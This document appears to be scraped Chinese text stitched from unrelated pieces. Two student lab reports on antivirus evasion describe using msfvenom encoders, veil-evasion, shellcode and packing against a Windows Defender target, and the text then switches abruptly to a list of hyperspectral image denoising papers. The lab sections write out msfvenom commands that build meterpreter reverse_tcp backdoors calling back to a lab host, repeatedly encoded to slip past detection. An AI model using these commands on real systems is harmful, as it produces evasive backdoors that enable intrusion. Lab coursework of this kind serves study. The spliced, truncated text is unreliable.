hyperion

2019-2020-2 网络对抗技术 20174326旦增列措 EXP3 免杀原理与实践 1.实验环境 PC机一台，安装有win10系统 ，作为靶机进行实测 安装的kali虚拟机，作为攻击机 kali虚拟机安装有veil-evasion win10系统有windows Defender作为杀软. 检测网站是VirusTotal 实验准备即相关知识 VirusTotal、Virscan 集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。 链接如下： VirusTotal Virscan Msfvenom使用编码器 Msfvenom是Metasploit平台下用来编码payloads免杀的工具。 模板是msfvenom用来生成最终Exe的那个壳子exe文件，msfvenom会以固定的模板生成exe，所有它生成的exe，如果使用默认参数或模板，也有一定的固定特征。 Veil-Evasion Veil-Evasion是一个免杀平台，与Metasploit有点类似，在Kalil软件库中有，但默认没装。 C语言调用Shellcode 就是一个半手工打造恶意软件的例子。 加壳 加壳的全称应该是可执行程序资源压缩，压缩后的程序可以直接运行。 加壳的另一种常用的方式是在二进制的程序中植入一段代码，在运行的时候优先取得程序的控制权，之后再把控制权交还给原始代码

2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践 一、实验内容 任务一正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，利用shellcode编程等免杀工具或技巧 1、使用msf编码器，生成exe文件 使用exp2中生产的后门程序 20165334_backdoor.exe 利用 VirusTotal 网站进行扫描检测。 20165334_backdoor.exe 利用 Virscan 网站进行扫描检测。 -使msf编码器对后门程序进行多次的编码，并检测。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.56.102 LPORT=5334 -f exe > met-lt5334l.exe 用使用virscan进行扫描，结果如下所示 msfvenom生成jar文件 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> ltl_backdoor_java.jar 用使用virscan进行扫描，结果如下所示 msfvenom生成php文件 msfvenom -p php

　　最近在跟同学一起做高光谱图像去噪相关的实验，同学找到了一个github上的资源清单，感觉非常有用，分享在这里： 点我看宝藏 　　感谢 Yongshen Zhao 和 Junjun Jiang 整理的这份资料~ 　　下面我大致做一点翻译，让大家可以更方便地了解到这份资料的内容： 　　 　　一、去噪方法 　　1、带式去噪方法（Band-wise denoising methods） [BM3D] 通过稀疏3-D变换域协同过滤进行图像去噪，TIP2007，K。Dabov等。 [WNNM] 应用于图像去噪的加权核范数最小化，CVPR2014，S。Gu等。 [EPLL] 从自然图像斑块的学习模型到整个图像恢复，ICCV2011，D。Zoran等。 　　2、基于多频段的方法 　　1）变换域方法 基于小波的高光谱图像估计，IGARSS2003，I。Atkinson等。 使用3D小波进行高光谱图像去噪，IGARSS2013，B。Rasti等。 用于体数据去噪和重建的非局部变换域滤波器，TIP2012，M。Maggioni等。 使用小波域中的一阶谱粗糙度惩罚的高光谱图像去噪，JStars2014，B.Rasti等。 　　2）空间域方法 　　通过采用合理的假设或先验，例如沿Spetrum的全局相关，跨空间的非局部自相似性（NSS），总变差（TV），非本地（Non-Local），稀疏表示（SR）